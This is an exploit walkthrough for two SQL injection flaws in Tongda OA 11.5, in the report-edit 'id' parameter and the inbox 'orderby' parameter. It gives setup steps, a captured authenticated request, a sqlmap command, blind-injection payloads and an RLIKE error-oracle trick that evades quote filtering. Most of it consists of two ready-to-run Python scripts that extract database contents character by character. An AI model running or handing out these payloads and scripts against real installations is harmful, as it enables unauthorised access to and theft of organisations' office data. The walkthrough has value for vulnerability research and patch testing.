1. Download Tongda OA: https://cdndown.tongda2000.com/oa/2019/TDOA11.5.exe
(After installation, log in as admin with an empty password.)
2. Create an ordinary (low-privilege) user test:test123456
3. The id parameter is SQL-injectable
Prerequisite: a login as an ordinary user. Testing showed that some older versions can be injected without logging in at all.
Parameter location:
/general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2
In webroot\general\appbuilder\modules\report\controllers\RepdetailController.php, the actionEdit
function reads $_GET["id"] and concatenates it into the SQL statement without any filtering.
GET /general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2 HTTP/1.1
Host: 192.168.77.137
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Cookie: PHPSESSID=2jtfe5ckpfh9mklegtgs0t1e73; USER_NAME_COOKIE=test; OA_USER_ID=65; SID_65=9e1a1f39
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
4. Log in as the test user, request http://192.168.77.135/general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2, and capture the request with Burp.
5. Run sqlmap against it (the * values are your own session cookies, which differ per login; take them from the captured request):
sqlmap -u "http://localhost/general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2" -p "id" --cookie="PHPSESSID=*****; USER_NAME_COOKIE=test; OA_USER_ID=65; SID_65=*****" --current-db
sqlmap payloads. Boolean-based blind: link_type=false&slot={}&id=(SELECT (CASE WHEN (2489=2489) THEN 2 ELSE (SELECT 2530 UNION SELECT 6370) END))
Time-based blind: link_type=false&slot={}&id=2 OR (SELECT 4201 FROM (SELECT(SLEEP(5)))birR)
Injection point 2: the orderby parameter
Prerequisite: a login as an ordinary user. Testing showed that some older versions can be injected without logging in at all.
Position one: /general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3&pagelimit=10&tag=&timestamp=1598069103&total=
Position two: /general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=&pagelimit=10&tag=&timestamp=1598069103&total=
Here we use RLIKE for error-based injection. RLIKE is a synonym for the REGEXP operator (REGEXP_LIKE() in MySQL 8.0). If the pattern on its right-hand side is an unbalanced special character such as ( or ), the regexp engine raises an error. So a CASE expression that yields 1 when the condition is true produces a valid pattern and a normal response, while the special character it yields when the condition is false makes the query error out. Single quotes are filtered here, so the character is written as a hex literal: 0x28 is "(".
Test statements:
3 RLIKE (SELECT (CASE WHEN (1=1) THEN 1 ELSE 0x28 END)) # 1=1 is true, yields 1, normal response
3 RLIKE (SELECT (CASE WHEN (1=2) THEN 1 ELSE 0x28 END)) # 1=2 is false, yields 0x28, "(" is an invalid regexp and errors
1=1: normal response
1=2: error
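A generic blind-extraction helper that covers both injection points (the CASE payload sqlmap used on the id parameter and the RLIKE error oracle on orderby), added here as an example; it is not part of the original write-up or of Tongda OA. The host, the cookie placeholders and simulated_oracle (a constructed stand-in for the server, used to run the search offline) are assumptions; the live orderby_oracle uses the same "timestamp" response check as the write-up's own script. It recovers each character with a binary search over printable ASCII and stops cleanly at the end of the string, which the search-range trick with substr() makes visible as a comparison that fails for every guess.

```python
# Added example, not from the original write-up. Assumed: HOST, COOKIE values,
# and the constructed simulated_oracle used for offline testing.
import urllib.parse
import urllib.request
from typing import Callable

HOST = "http://192.168.77.135"  # assumed lab host
# Session of the low-privilege "test" user; replace with values from your own captured request
COOKIE = "PHPSESSID=<sid>; USER_NAME_COOKIE=test; OA_USER_ID=65; SID_65=<sid65>"

# An oracle answers: is substr(<expr>, pos, 1) >= chr(guess) ?  (MySQL substr() is 1-indexed)
Oracle = Callable[[int, int], bool]


def rlike_payload(expr: str, pos: int, guess: int) -> str:
    """orderby value for get_index_data.php. When the comparison holds the CASE yields 1,
    a valid regexp; otherwise it yields 0x28 = "(" and MySQL fails with a regexp error.
    hex(guess) is a MySQL hex literal, so no single quotes (which are filtered) are needed."""
    return ("3 RLIKE (SELECT (CASE WHEN (substr({},{},1)>={}) THEN 1 ELSE 0x28 END))"
            .format(expr, pos, hex(guess)))


def id_payload(expr: str, pos: int, guess: int) -> str:
    """id value for repdetail/edit, same shape as sqlmap's boolean-blind payload: a true
    comparison selects the existing report id 2, a false one a two-row subquery that errors."""
    return ("(SELECT (CASE WHEN (substr({},{},1)>={}) THEN 2 ELSE (SELECT 2530 UNION SELECT 6370) END))"
            .format(expr, pos, hex(guess)))


def orderby_oracle(expr: str) -> Oracle:
    """Live oracle for injection point 2: a normal JSON reply contains "timestamp",
    an SQL error reply does not."""
    def ask(pos: int, guess: int) -> bool:
        params = {"asc": "0", "boxid": "", "boxname": "inbox", "curnum": "0",
                  "emailtype": "ALLMAIL", "keyword": "",
                  "orderby": rlike_payload(expr, pos, guess),
                  "pagelimit": "10", "tag": "", "timestamp": "1598069103", "total": ""}
        url = HOST + "/general/email/inbox/get_index_data.php?" + urllib.parse.urlencode(params)
        req = urllib.request.Request(url, headers={"Cookie": COOKIE})
        with urllib.request.urlopen(req) as resp:
            return "timestamp" in resp.read().decode("utf-8", "replace")
    return ask


def extract(oracle: Oracle, max_len: int = 64) -> str:
    """Recover the string one character at a time with a binary search over printable
    ASCII (0x20..0x7E): about 7 requests per character instead of up to 95 linear guesses."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(pos, 0x20):      # substr() past the end returns '', which is < ' '
            break                      # -> end of string
        lo, hi = 0x20, 0x7F            # invariant: char >= lo and char < hi
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if oracle(pos, mid):
                lo = mid
            else:
                hi = mid
        if lo == 0x7E and oracle(pos, 0x7F):   # byte beyond printable ASCII: outside the range
            raise ValueError("non-ASCII byte at position %d" % pos)
        out += chr(lo)
    return out


def simulated_oracle(secret: str) -> Oracle:
    """Constructed stand-in for the real server, used to test the search logic offline.
    Mirrors MySQL's binary comparison of a hex literal against substr(): '' is < any byte."""
    def ask(pos: int, guess: int) -> bool:
        ch = secret[pos - 1:pos].encode()
        return ch >= bytes([guess]) if ch else False
    return ask


if __name__ == "__main__":
    # offline demonstration against the constructed oracle
    print(extract(simulated_oracle("TD_OA")))
    # against the lab box: print(extract(orderby_oracle("(select database())")))
```

To target injection point 1 instead, build an oracle around id_payload() in the same way and decide truth by whether the edit page renders normally; the extract() search is identical for both.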
A script to automate the injection:
import requests

url = 'http://localhost/general/email/inbox/get_index_data.php'
# session cookies of the low-privilege user "test"; replace with your own values
cookies = "Pycharm-2c6ec227=c1fc5950-b2d3-4880-90f2-e1df25f3514d; USER_NAME_COOKIE=test; SID_65=689c2441; PHPSESSID=jq9lcf0tv2vn13n46rr9dhp1n1; OA_USER_ID=65"
headers = {"cookie": cookies}

sql = '(select database())'  # expression to extract, one character at a time
flag = ''

for i in range(1, 50):
    # binary search for the i-th character; mid ends up one above the character's code
    high = 132
    low = 32
    mid = (high + low) // 2
    while high > low:
        # orderby=3 RLIKE (...): the CASE yields 1 (a valid regexp) when the guess holds,
        # otherwise 0x28 = "(", an invalid regexp that makes the query error out.
        # hex(mid) is sent as a MySQL hex literal, so no (filtered) single quotes are needed.
        target = url + "?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3 RLIKE (SELECT (CASE " \
                       "WHEN (substr({0},{1},1)>={2}) THEN 1 ELSE 0x28 " \
                       "END))&pagelimit=10&tag=&timestamp=1598069103&total=".format(sql, i, hex(mid))
        # print(target)
        s = requests.get(url=target, headers=headers)
        # a normal reply contains "timestamp"; an SQL error reply does not
        if 'timestamp' in s.text:
            low = mid + 1   # substr(...) >= mid holds
        else:
            high = mid      # substr(...) < mid
        mid = (high + low) // 2
    # mid == 32: substr() returned '' (end of string); 33: a space; 132: byte outside the search range
    if mid in (32, 33, 132):
        break
    flag += chr(mid - 1)
    print("[+] " + flag)
The extracted database name is t0z0a.